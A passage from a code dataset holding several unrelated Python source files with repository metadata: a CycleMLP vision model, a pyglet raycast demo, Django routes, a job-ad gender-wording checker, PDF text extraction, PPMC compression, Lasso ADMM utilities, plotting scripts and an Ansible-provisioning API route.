qk_scale=None, attn_drop=0.,\n skip_lam=1.0, mlp_fn=CycleMLP, **kwargs):\n blocks = []\n\n for block_idx in range(layers[index]):\n blocks.append(CycleBlock(dim, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop=attn_drop, skip_lam=skip_lam, mlp_fn=mlp_fn))\n blocks = nn.Sequential(*blocks)\n\n return blocks\n\n\nclass CycleNet(nn.Module):\n \"\"\" CycleMLP Network \"\"\"\n def __init__(self, layers, img_size=224, patch_size=4, in_chans=3, num_classes=1000,\n embed_dims=None, transitions=None, segment_dim=None, mlp_ratios=None, skip_lam=1.0,\n qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,\n norm_layer=nn.LayerNorm, mlp_fn=CycleMLP, fork_feat=False):\n\n super().__init__()\n if not fork_feat:\n self.num_classes = num_classes\n self.fork_feat = fork_feat\n\n self.patch_embed = PatchEmbedOverlapping(patch_size=7, stride=4, padding=2, in_chans=3, embed_dim=embed_dims[0])\n\n network = []\n for i in range(len(layers)):\n stage = basic_blocks(embed_dims[i], i, layers, mlp_ratio=mlp_ratios[i], qkv_bias=qkv_bias,\n qk_scale=qk_scale, attn_drop=attn_drop_rate, \n norm_layer=norm_layer, skip_lam=skip_lam, mlp_fn=mlp_fn)\n network.append(stage)\n if i >= len(layers) - 1:\n break\n if transitions[i] or embed_dims[i] != embed_dims[i+1]:\n patch_size = 2 if transitions[i] else 1\n network.append(Downsample(embed_dims[i], embed_dims[i+1], patch_size))\n\n self.network = nn.ModuleList(network)\n\n if self.fork_feat:\n # add a norm layer for each output\n self.out_indices = [0, 2, 4, 6]\n for i_emb, i_layer in enumerate(self.out_indices):\n if i_emb == 0 and os.environ.get('FORK_LAST3', None):\n # TODO: more elegant way\n \"\"\"For RetinaNet, `start_level=1`. The first norm layer will not used.\n cmd: `FORK_LAST3=1 python -m torch.distributed.launch ...`\n \"\"\"\n layer = nn.Identity()\n else:\n layer = norm_layer(embed_dims[i_emb])\n layer_name = f'norm{i_layer}'\n self.add_module(layer_name, layer)\n else:\n # Classifier head\n self.norm = norm_layer(embed_dims[-1])\n self.head = nn.Linear(embed_dims[-1], num_classes) if num_classes > 0 else nn.Identity()\n self.apply(self.cls_init_weights)\n\n def cls_init_weights(self, m):\n if isinstance(m, nn.Linear):\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\n elif isinstance(m, CycleFC):\n nn.init.constant_(m.bias, 0)\n\n def get_classifier(self):\n return self.head\n\n def reset_classifier(self, num_classes, global_pool=''):\n self.num_classes = num_classes\n self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()\n\n def forward_embeddings(self, x):\n x = self.patch_embed(x)\n # B,C,H,W-> B,H,W,C\n x = x.permute(0, 2, 3, 1)\n return x\n\n def forward_tokens(self, x):\n outs = []\n for idx, block in enumerate(self.network):\n x = block(x)\n if self.fork_feat and idx in self.out_indices:\n norm_layer = getattr(self, f'norm{idx}')\n x_out = norm_layer(x)\n outs.append(x_out.permute(0, 3, 1, 2).contiguous())\n if self.fork_feat:\n return outs\n\n B, H, W, C = x.shape\n x = x.reshape(B, -1, C)\n return x\n\n def forward(self, x):\n x = self.forward_embeddings(x)\n # B, H, W, C -> B, N, C\n x = self.forward_tokens(x)\n if self.fork_feat:\n return x\n\n x = self.norm(x)\n cls_out = self.head(x.mean(1))\n return cls_out\n\ndef CycleMLP_B1(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [2, 2, 4, 2]\n mlp_ratios = [4, 4, 4, 
4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B2(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [2, 3, 10, 3]\n mlp_ratios = [4, 4, 4, 4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B3(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [3, 4, 18, 3]\n mlp_ratios = [8, 8, 4, 4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B4(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [3, 8, 27, 3]\n mlp_ratios = [8, 8, 4, 4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B5(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [3, 4, 24, 3]\n mlp_ratios = [4, 4, 4, 4]\n embed_dims = [96, 192, 384, 768]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\nif __name__ == \"__main__\":\n x = torch.randn(2, 3, 224, 224)\n model = CycleMLP_B1()\n y = model(x)\n print(y.shape)\n\n","repo_name":"changzy00/pytorch-attention","sub_path":"mlps/cyclemlp.py","file_name":"cyclemlp.py","file_ext":"py","file_size_in_byte":13668,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"77"} +{"seq_id":"10869084160","text":"import math\n\nimport pyglet\nfrom pyglet.window import key\nfrom pyglet import shapes\n\nfrom objects import Vector, Line\n\n# initialize\n# CONSTANTS\n# the render screen\nSCREEN = {\n \"width\": 960,\n \"height\": 540,\n}\nFIELD = {\n \"width\": 100,\n \"height\": 100,\n}\nSTART_POSITION = Vector(FIELD[\"width\"] // 2, FIELD[\"height\"] // 2)\nSTART_VIEW_DIR = Vector(0, 1)\n\n# Game objects\n# the game field\nclass Field:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self._set_bound_lines()\n\n def _set_bound_lines(self):\n bound_N = Line((0, 0), (self.width, 0))\n bound_E = Line((self.width, 0), (self.width, self.height))\n bound_S = Line((0, self.height), (self.width, self.height))\n bound_W = Line((0, 0), (0, self.height))\n\n self.lines = [bound_N, bound_E, bound_S, bound_W]\n\n def init_render(self, game):\n self.repr = []\n for line in self.lines:\n line.init_render(game)\n self.repr.append(line.repr)\n\n\n# the player object\nclass Player:\n # should have set all consts like this, i think\n size = 3\n fov = math.pi / 2\n\n def __init__(self, pos: Vector, view: Vector):\n self.position = pos\n self.view_dir = view\n\n def init_render(self, game):\n point = shapes.Circle(\n self.position.x, self.position.y, radius=self.size, batch=game.batch\n )\n view_cone_L_line = Line(\n self.position,\n self.view_dir.rotate(self.fov / 2).intersects_at(\n self.view_dir.intersects_which(game.field.lines)\n ),\n )\n view_cone_R_line = Line(\n self.position,\n self.view_dir.rotate(-self.fov / 2).intersects_at(\n self.view_dir.intersects_which(game.field.lines)\n ),\n )\n\n 
view_cone_L = view_cone_L_line.init_render(game)\n        view_cone_R = view_cone_R_line.init_render(game)\n\n        self.repr = (point, view_cone_L, view_cone_R)\n\n\n# objects in the game\nclass Game(pyglet.window.Window):\n    player = Player(START_POSITION, START_VIEW_DIR)\n    field = Field(FIELD[\"width\"], FIELD[\"height\"])\n\n    def __init__(self, width, height):\n        super().__init__(width, height)\n        self.batch = pyglet.graphics.Batch()\n\n        self.player.init_render(self)\n        self.field.init_render(self)\n\n    def on_draw(self):\n        self.clear()\n        self.batch.draw()\n\n\nif __name__ == \"__main__\":\n    game = Game(\n        SCREEN[\"width\"], SCREEN[\"height\"]\n    )  # consider would state = AppState() fit here?\n    event_logger = pyglet.window.event.WindowEventLogger()\n    game.push_handlers(event_logger)\n    pyglet.app.run()\n","repo_name":"Goluxas/raycast-render","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"19689578137","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n    path(\"entry/\", views.EntryDash.as_view(), name=\"entry\"),\n    path('login/', views.LoginForm.as_view(), name='login'),\n    path('register/', views.RegisterForm.as_view(), name='register'),\n]","repo_name":"yuri-potatoq/djangopad","sub_path":"dashboard/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"19189641518","text":"import re\nimport wordlists\n\ndef assess(ad_text):\n    ad_text = ''.join([i if ord(i) < 128 else ' ' for i in ad_text])\n    ad_text = re.sub(\"[\\\\s]\", \" \", ad_text, 0, 0)\n    ad_text = re.sub(\"[\\.\\t\\,\\:;\\(\\)\\.]\", \"\", ad_text, 0, 0).split(\" \")\n    ad_text = [ad for ad in ad_text if ad != \"\"]\n    \n    masculine_coded_words = [adword for adword in ad_text\n                             for word in wordlists.masculine_coded_words\n                             if adword.startswith(word)]\n    \n    feminine_coded_words = [adword for adword in ad_text\n                            for word in wordlists.feminine_coded_words\n                            if adword.startswith(word)]\n    \n    if feminine_coded_words and not masculine_coded_words:\n        result = \"strongly feminine-coded\"\n    elif masculine_coded_words and not feminine_coded_words:\n        result = \"strongly masculine-coded\"\n    elif not masculine_coded_words and not feminine_coded_words:\n        result = \"neutral\"\n    else:\n        # check the \"strongly\" ratio cases before the plain count comparison,\n        # otherwise the plain comparison always overwrites them\n        if len(feminine_coded_words) == len(masculine_coded_words):\n            result = \"neutral\"\n        elif ((len(feminine_coded_words) / len(masculine_coded_words)) >= 2 and\n              len(feminine_coded_words) > 5):\n            result = \"strongly feminine-coded\"\n        elif ((len(masculine_coded_words) / len(feminine_coded_words)) >= 2 and\n              len(masculine_coded_words) > 5):\n            result = \"strongly masculine-coded\"\n        elif len(feminine_coded_words) > len(masculine_coded_words):\n            result = \"feminine-coded\"\n        elif len(masculine_coded_words) > len(feminine_coded_words):\n            result = \"masculine-coded\"\n    \n    if \"feminine\" in result:\n        explanation = (\"This job ad uses more words that are stereotypically feminine \"\n                       \"than words that are stereotypically masculine. Fortunately, the research \"\n                       \"suggests this will have only a slight effect on how appealing the job is \"\n                       \"to men, and will encourage women applicants.\")\n    elif \"masculine\" in result:\n        explanation = (\"This job ad uses more words that are stereotypically masculine \"\n                       \"than words that are stereotypically feminine. 
It risks putting women off \"\n                       \"applying, but will probably encourage men to apply.\")\n    elif not masculine_coded_words and not feminine_coded_words:\n        explanation = (\"This job ad doesn't use any words that are stereotypically \"\n                       \"masculine or stereotypically feminine. It probably won't be off-putting \"\n                       \"to men or women applicants.\")\n    else:\n        explanation = (\"This job ad uses an equal number of words that are \"\n                       \"stereotypically masculine and stereotypically feminine. It probably won't \"\n                       \"be off-putting to men or women applicants.\")\n\n    return {\"result\": result,\n            \"explanation\": explanation,\n            \"masculine_coded_words\": masculine_coded_words,\n            \"feminine_coded_words\": feminine_coded_words\n            }\n","repo_name":"mirandaadong/DataScienceDiscoveryResearch","sub_path":"genderDecoder/genderDecoder/assess.py","file_name":"assess.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"70514202488","text":"from pdfminer.layout import LAParams\r\nfrom pdfminer.converter import PDFPageAggregator\r\nfrom pdfminer.pdfinterp import PDFResourceManager\r\nfrom pdfminer.pdfinterp import PDFPageInterpreter\r\nfrom pdfminer.pdfpage import PDFPage\r\nfrom pdfminer.layout import LTTextBoxHorizontal\r\n\r\ndef parsedocument(document):\r\n    # convert all horizontal text into a list of lines\r\n    lines = []\r\n    rsrcmgr = PDFResourceManager()\r\n    # use pdfminer's default layout analysis parameters for line and word grouping\r\n    laparams = LAParams()\r\n    device = PDFPageAggregator(rsrcmgr, laparams=laparams)\r\n    interpreter = PDFPageInterpreter(rsrcmgr, device)\r\n    for page in PDFPage.get_pages(document):\r\n        interpreter.process_page(page)\r\n        layout = device.get_result()\r\n        for element in layout:\r\n            if isinstance(element, LTTextBoxHorizontal):\r\n                lines.extend(element.get_text().splitlines())\r\n    return lines\r\n\r\n#make sure it works with an example pdf file\r\npdf_file_obj = open(\"sample.pdf\",\"rb\")\r\npdf_reader = parsedocument(pdf_file_obj)\r\nstring = str(pdf_reader).strip(\"[]\")\r\n\r\nprint(\"Here are the contents of your pdf file:\")\r\nprint(string)\r\n\r\n#saves the contents to a created txt file\r\n#add directory wanted to save to\r\nfile1 = open(r\"C:\\files_txt\\test.txt\",\"a\")\r\nfile1.writelines( \"%s\\n\" % item for item in pdf_reader )\r\nfile1.close()\r\n","repo_name":"Tsutton908/PDF-to-TXT-with-spacing","sub_path":"pdf_convert.py","file_name":"pdf_convert.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"13504135644","text":"import logging\nfrom Context import Context\n\nclass Model(object):\n\n    def __init__(self, number):\n        self.number = number\n        self.contexts = {}\n        self.toAdd = []\n\n    def __add(self, newContext):\n        self.toAdd.append(newContext)\n\n    def __refreshModel(self):\n        # iterate over a stable view and key the lookup by name; popping while\n        # indexing skipped entries and compared a Context object against name keys\n        for currContext in self.toAdd:\n            if currContext.name() not in self.contexts:\n                self.contexts[currContext.name()] = currContext\n        self.toAdd = []\n\n    def compress(self, text, charIndex, previousContexts, interval):\n        self.__refreshModel()\n        if (charIndex >= self.number):\n            #In this case, the model can take the amount of characters\n            #indicated by self.number as context\n            character = text[charIndex]\n            #logging.info( \"MODEL #\"+str(self.number))\n            currContext = text[charIndex] if (self.number == 0) else text[charIndex-self.number:charIndex]\n            
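# e.g. with text = \"abcd\" and number = 2, at charIndex = 3 the context is\n            # text[1:3] == \"bc\" and the symbol being coded is \"d\" (illustrative\n            # values, not from the source)\n            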
#logging.info( \"compressing (\" +str(currContext)+ \")\" + str(character))\n #logging.info( \"available contexts:\" +str(self.contexts.keys()))\n\n if (currContext in self.contexts):\n return self.contexts[currContext].compress(character, previousContexts, interval)\n elif (currContext != \"\"):\n #This context does not exist in this model, so we add it.\n self.__add(Context(currContext,character))\n #logging.info( \"Added context:\" + currContext + \" to model \"+str(self.number))\n\n #This context could not compress this text because\n #it does not contain the desired context.\n return (False, interval)\n","repo_name":"emariotti3/VowpalWabbit","sub_path":"PPMC/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22245825760","text":"import pdb, time\nimport numpy as np\nimport scipy.sparse as sparse\nfrom scipy.sparse.linalg import spsolve\nfrom numpy.linalg import norm, cholesky\n\ndef BIC(y_true, y_pred, n_features):\n\t\"\"\"Calculate the Bayesian Information Criterion under the assumption of \n\tnormally distributed disturbances (which allows the BIC to take on the\n\tsimple form below).\n\t\n\tParameters\n\t----------\n\tReturns\n\t-------\n\tBIC : float\n\t\tBayesian Information Criterion\n\t\"\"\"\n\tn_samples = y_true.size\n\trss = np.sum((y_true - y_pred)**2)\n\tBIC = n_samples * np.log(rss/n_samples) + n_features * np.log(n_samples)\n\treturn BIC\n\ndef AIC(y_true, y_pred, n_features):\n\tn_samples = y_true.size\n\trss = np.sum((y_true - y_pred)**2)\n\tAIC = n_samples * np.log(rss/n_samples) + n_features * 2\n\treturn AIC\n\ndef AICc(y_true, y_pred, n_features):\n\tn_samples = y_true.size\n\trss = np.sum((y_true - y_pred)**2)\n\tAICc = n_samples * np.log(rss/n_samples) + n_features * 2 \\\n\t\t+ 2 * (n_features**2 + n_features)/(n_samples - n_features - 1)\n\treturn AICc\n\ndef leveled_randomized_ids(groups, fraction):\n\t\"\"\"Grab bootstrap indices that are leveled across groups.\n\n\tParameters\n\t----------\n\tgroups : array of size (n_samples)\n\t\tcontains indices identifying each sample to a specific group\n\n\tfraction : float\n\t\tfraction of samples to be selected\n\n\tReturns\n\t-------\n\tleveled_ids : array of size (n_selected_samples)\n\t\tcontains the leveled indices that are selected into the bootstrap\n\n\tleftover_ids : array\n\t\tcontains the leftover indices (useful for splitting into train/test sets)\n\n\t\"\"\"\n\t# initialize id arrays\n\tleveled_ids = np.array([])\n\tleftover_ids = np.array([])\n\t# extract unique group ids\n\tunique_ids = np.unique(groups)\n\t# iterate through the unique group ids\n\tfor group_id in unique_ids:\n\t\t# extract the sample indices in the current group\n\t\tcandidate_idx = np.argwhere(groups == group_id).ravel()\n\t\t# number of samples that'll be selected from this group into bootstrap\n\t\tn_ids_group = int(fraction * candidate_idx.size)\n\t\t# permute the ids\n\t\tpermuted = np.random.permutation(candidate_idx)\n\t\t# split up the ids into the selected and leftover arrays\n\t\tselected_ids_group, leftover_ids_group = np.split(permuted, [n_ids_group])\n\t\t# toss the selected/leftover ids in their corresponding group\n\t\tleveled_ids = np.append(leveled_ids, selected_ids_group)\n\t\tleftover_ids = np.append(leftover_ids, leftover_ids_group)\n\treturn leveled_ids.astype('int'), leftover_ids.astype('int')\n\ndef lasso_admm(X, y, lamb, rho=1., alpha=1., \n\t\t\tmax_iter=1000, abs_tol=1e-5, 
rel_tol=1e-3,\n\t\t\tverbose=False):\n\t\"\"\"Solve the Lasso optimization problem using Alternating Direction Method of Multipliers (ADMM)\n\t\n\tConvergence criteria are given in section 3.3.1 in the Boyd manuscript (equation 3.12).\n\t\"\"\"\n\tn_samples, n_features = X.shape\n\n\t# initialize parameter estimates x/z and dual estimates u (equivalent to y)\n\tx = np.zeros((n_features, 1))\n\tz = np.zeros((n_features, 1))\n\t# dual; equivalent to y in most formulations\n\tu = np.zeros((n_features, 1))\n\n\tXy = np.dot(X.T, y).reshape((n_features, 1))\n\tinv = np.linalg.inv(np.dot(X.T, X) + rho * np.identity(n_features))\n\n\tfor iteration in range(max_iter):\n\t\t# update x estimates\n\t\tx = np.dot(inv, Xy + rho * (z - u))\n\n\t\t# handle the over-relaxation term\n\t\tz_old = np.copy(z)\n\t\tx_hat = alpha * x + (1 - alpha) * z_old\n\t\t\n\t\t# update z term with over-relaxation\n\t\tz = shrinkage(x=x_hat, threshold=lamb/rho)\n\n\t\t# update dual\n\t\tu += x_hat - z\n\n\t\t# check convergence using eqn 3.12\n\t\tr_norm = norm(x - z)\n\t\ts_norm = norm(rho * (z - z_old))\n\n\t\teps_primal = np.sqrt(n_features) * abs_tol + np.maximum(norm(x), norm(z)) * rel_tol\n\t\teps_dual = np.sqrt(n_features) * abs_tol + norm(u) * rel_tol\n\n\t\tif (r_norm <= eps_primal) and (s_norm <= eps_dual):\n\t\t\tif verbose: print('Convergence: iteration %s' %iteration)\n\t\t\tbreak\n\treturn z.ravel()\n\ndef lasso_admm_old(X, y, alpha, rho=1., rel_par=1., max_iter=50, ABSTOL=1e-3, RELTOL=1e-2):\n\t\"\"\"\n\t Solve lasso problem via ADMM\n\t\n\t [z, history] = lasso_admm(X,y,alpha,rho,rel_par)\n\t\n\t Solves the following problem via ADMM:\n\t\n\t\t minimize 1/2*|| Ax - y ||_2^2 + alpha || x ||_1\n\t\n\t The solution is returned in the vector z.\n\t\n\t history is a dictionary containing the objective value, the primal and\n\t dual residual norms, and the tolerances for the primal and dual residual\n\t norms at each iteration.\n\t\n\t rho is the augmented Lagrangian parameter.\n\t\n\t rel_par is the over-relaxation parameter (typical values for rel_par are\n\t between 1.0 and 1.8).\n\t\n\t More information can be found in the paper linked at:\n\t http://www.stanford.edu/~boyd/papers/distr_opt_stat_learning_admm.html\n\t\"\"\"\n\t# Data preprocessing\n\tn_samples, n_features = X.shape\n\t# save a matrix-vector multiply\n\tXy = np.dot(X.T, y).reshape((n_features, 1))\n\n\t# ADMM solver\n\tx = np.zeros((n_features, 1))\n\tz = np.zeros((n_features, 1))\n\tu = np.zeros((n_features, 1))\n\n\t# cache the (Cholesky) factorization\n\tL, U = factor(X, rho)\n\n\tfor k in range(max_iter):\n\t\t# x-update \n\t\tq = Xy + rho * (z - u) # (temporary value)\n\t\tif n_samples >= n_features:\n\t\t\tx = spsolve(U, spsolve(L, q)).reshape((n_features, 1))\n\t\telse:\n\t\t\tULXq = spsolve(U, spsolve(L, X.dot(q)))\n\t\t\tx = (q * 1. / rho) - ((np.dot(X.T, ULXq)) * 1. / (rho ** 2))\n\t\t# z-update with relaxation\n\t\tzold = np.copy(z)\n\t\tx_hat = rel_par * x + (1. - rel_par) * zold\n\t\tz = shrinkage(x_hat + u, alpha * 1. 
/ rho)\n\t\t# u-update\n\t\tu += (x_hat - z)\n\n\t\t# diagnostics, reporting, termination checks\n\t\t#objval = objective(X, y, alpha, x, z)\n\t\tr_norm = norm(x - z)\n\t\ts_norm = norm(-rho * (z - zold))\n\t\teps_pri = np.sqrt(n_features) * ABSTOL + RELTOL * np.maximum(norm(x), norm(-z))\n\t\teps_dual = np.sqrt(n_features) * ABSTOL + RELTOL * norm(rho * u)\n\n\t\tif (r_norm < eps_pri) and (s_norm < eps_dual):\n\t\t\tbreak\n\n\treturn z.ravel()\n\ndef shrinkage(x, threshold):\n\treturn np.maximum(0., x - threshold) - np.maximum(0., -x - threshold)\n\ndef factor(X, rho):\n\tn_samples, n_features = X.shape\n\tif n_samples >= n_features:\n\t\t\tL = cholesky(np.dot(X.T, X) + rho * sparse.eye(n_features))\n\telse:\n\t\t\tL = cholesky(sparse.eye(n_samples) + 1. / rho * (np.dot(X, X.T)))\n\tL = sparse.csc_matrix(L)\n\tU = sparse.csc_matrix(L.T)\n\treturn L, U\n","repo_name":"pssachdeva/uoi-neuro","sub_path":"retina_strf/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41849997070","text":"\nimport pylab as plt\nimport numpy as np\nimport pandas as pd\n\nxvalues = np.arange(0.0, 20.0, 0.1)\n\ndf = pd.DataFrame({\n 'x': xvalues,\n 'sin': np.sin(xvalues),\n 'cos': np.cos(xvalues),\n 'tan': np.tan(xvalues),\n 'log': np.log(xvalues),\n})\n\nfig = plt.figure()\n\nax1 = fig.add_subplot(2, 2, 1)\nax1.plot(df['x'], df['sin'], 'k--')\nplt.xlabel('x')\nplt.ylabel('$sin(x)$')\nplt.axis([0.0, 20.0, -1.2, 1.2])\n\nax2 = fig.add_subplot(2, 2, 2)\nax2.plot(df['x'], df['cos'], 'r^')\nplt.xlabel('x')\nplt.ylabel('$cos(x)$')\nplt.axis([0.0, 20.0, -1.2, 1.2])\n\nax3 = fig.add_subplot(2, 2, 3)\nax3.plot(df['x'], df['tan'], 'g-')\nplt.xlabel('x')\nplt.ylabel('$tan(x)$')\nplt.axis([0.0, 20.0, 0.0, 30.0])\n\nax4 = fig.add_subplot(2, 2, 4)\nax4.plot(df['x'], df['log'], 'bo')\nplt.xlabel('x')\nplt.ylabel('$log(x)$')\nplt.axis([0.0, 20.0, -5, 5.0])\n\nplt.subplots_adjust(wspace=0.4, hspace=0.4)\nplt.savefig('multipanel.png')\nplt.savefig('multipanel.svg')\n","repo_name":"krother/python3_grundlagenkurs","sub_path":"datenanalyse/datenvisualisierung/multipanel.py","file_name":"multipanel.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"30550563232","text":"\"\"\"Routes for handling device/base_config-related requests.\"\"\"\n\nfrom fastapi import APIRouter\nfrom fastapi.responses import JSONResponse\nfrom pydantic import BaseModel, HttpUrl\n\nfrom lso import playbook\nfrom lso.playbook import get_playbook_path\n\nrouter = APIRouter()\n\n\nclass NodeProvisioningParams(BaseModel):\n \"\"\"Parameters for node provisioning.\n\n :param callback:\n :type callback: pydantic.HttpUrl\n :param subscription:\n :type subscription: :class:`DeviceParams`\n :param dry_run:\n :type dry_run: bool, optional\n \"\"\"\n\n #: Callback URL that is reported back to WFO, this will allow for the workflow to continue once the playbook has\n #: been executed.\n callback: HttpUrl\n #: Parameters for the new device.\n subscription: dict\n #: Whether this playbook execution should be a dry run, or run for real. 
Defaults to ``True`` for obvious reasons,\n #: also making it an optional parameter.\n dry_run: bool | None = True\n #: Trouble Ticket number that is associated with the deployment.\n tt_number: str\n #: The process ID generated by workflow orchestrator, used for the commit comment in the routers.\n process_id: str\n\n\n@router.post(\"/\")\nasync def provision_node(params: NodeProvisioningParams) -> JSONResponse:\n \"\"\"Launch a playbook to provision a new node. The response will contain either a job id or error information.\n\n :param params: Parameters for provisioning a new node\n :type params: :class:`NodeProvisioningParams`\n :return: Response from the Ansible runner, including a run ID.\n :rtype: :class:`lso.playbook.PlaybookLaunchResponse`\n \"\"\"\n extra_vars = {\n \"wfo_router_json\": params.subscription,\n \"dry_run\": str(params.dry_run),\n \"verb\": \"deploy\",\n \"commit_comment\": f\"GSO_PROCESS_ID: {params.process_id} - TT_NUMBER: {params.tt_number} - Deploy base config\",\n }\n\n return playbook.run_playbook(\n playbook_path=get_playbook_path(\"base_config.yaml\"),\n inventory=f\"{params.subscription['router']['router_fqdn']}\",\n extra_vars=extra_vars,\n callback=params.callback,\n )\n","repo_name":"workfloworchestrator/lso","sub_path":"lso/routes/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72913867766","text":"\"\"\"\nThéo Gauvrit\nMars 2022\nFunction to create from a excel/csv data file the correlation matrices and correlation nodes and heat map plots\n\"\"\"\nimport pandas as pd\nimport networkx as nx\nimport numpy as np\nfrom outliers import smirnov_grubbs as grubbs\nimport scipy.stats as sc\nfrom pyvis.network import Network\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom netgraph import Graph\n\nplt.rcParams['svg.fonttype'] = 'none'\nplt.rcParams['font.size'] = 40\nplt.rcParams['axes.linewidth'] = 3\n\n\ndef heatmap(x, y, size, color, filename):\n n_colors = 256 # Use 256 colors for the diverging color palette\n palette = sns.diverging_palette(20, 220, n=n_colors)\n palette.reverse() # Create the palette\n color_min, color_max = [-1,\n 1] # Range of values that will be mapped to the palette, i.e. 
min and max possible correlation\n\n def value_to_color(val):\n val_position = float((val - color_min)) / (\n color_max - color_min) # position of value in the input range, relative to the length of the input range\n ind = int(val_position * (n_colors - 1)) # target index in the color palette\n return palette[ind]\n\n plot_grid = plt.GridSpec(1, 24, hspace=0.2, wspace=0.1) # Setup a 1x15 grid\n fig = plt.figure(figsize=(30, 25))\n ax = plt.subplot(plot_grid[:, :-1])\n # Mapping from column names to integer coordinates\n x_labels = [v for v in list(x.unique())]\n y_labels = [v for v in list(y.unique())]\n x_to_num = {p[1]: p[0] for p in enumerate(x_labels)}\n y_to_num = {p[1]: p[0] for p in enumerate(y_labels)}\n size_scale = 900\n ax.scatter(\n x=x.map(x_to_num), # Use mapping for x\n y=y.map(y_to_num), # Use mapping for y\n s=(size * size_scale).astype(float), # Vector of square sizes, proportional to size parameter\n c=color.apply(value_to_color),\n marker='s' # Use square as scatterplot marker\n )\n # Show column labels on the axes\n ax.set_xticks([x_to_num[v] for v in x_labels])\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\n ax.set_yticks([y_to_num[v] for v in y_labels])\n ax.set_yticklabels(y_labels)\n ax.grid(False, 'major')\n ax.grid(True, 'minor')\n ax.set_xticks([t + 0.5 for t in ax.get_xticks()], minor=True)\n ax.set_yticks([t + 0.5 for t in ax.get_yticks()], minor=True)\n ax.set_xlim([-0.5, max([v for v in x_to_num.values()]) + 0.5])\n ax.set_ylim([-0.5, max([v for v in y_to_num.values()]) + 0.5])\n ax.tick_params(which='both', width=3)\n ax.tick_params(which='major', length=10)\n ax = plt.subplot(plot_grid[:, -1]) # Use the rightmost column of the plot\n col_x = [1.5] * len(palette) # Fixed x coordinate for the bars\n bar_y = np.linspace(color_min, color_max, n_colors) # y coordinates for each of the n_colors bars\n\n bar_height = bar_y[1] - bar_y[0]\n ax.barh(\n y=bar_y,\n width=[2] * len(palette), # Make bars 5 units wide\n left=col_x, # Make bars start at 0\n height=bar_height,\n color=palette,\n linewidth=0\n )\n ax.set_xlim(1, 3) # Bars are going from 0 to 5, so lets crop the plot somewhere in the middle\n ax.grid(False) # Hide grid\n ax.set_facecolor('white') # Make background white\n ax.set_xticks([]) # Remove horizontal ticks\n ax.set_yticks(np.linspace(min(bar_y), max(bar_y), 3)) # Show vertical ticks for min, middle and max\n ax.yaxis.tick_right() # Show vertical ticks on the right\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.tick_params(which='both', width=3)\n ax.tick_params(which='major', length=10)\n fig.subplots_adjust(bottom=0.30, left=0.30, right=0.95, top=0.99)\n fig.savefig(filename)\n\n\ndef correlation_matrix(all_parameters_data, parameters_to_exclude):\n print(all_parameters_data[\"GENOTYPE\"])\n col_names1 = list(all_parameters_data.columns)\n for col in parameters_to_exclude:\n print(col)\n col_names1.remove(col)\n all_parameters_data = all_parameters_data.drop(col, axis=1)\n pvalue_matrix = pd.DataFrame(index=col_names1, columns=col_names1)\n coeff_matrix = pd.DataFrame(index=col_names1, columns=col_names1)\n duo = []\n for (column_name, column_data) in all_parameters_data.iteritems():\n for (column_name1, column_data1) in all_parameters_data.iteritems():\n if column_name1 == 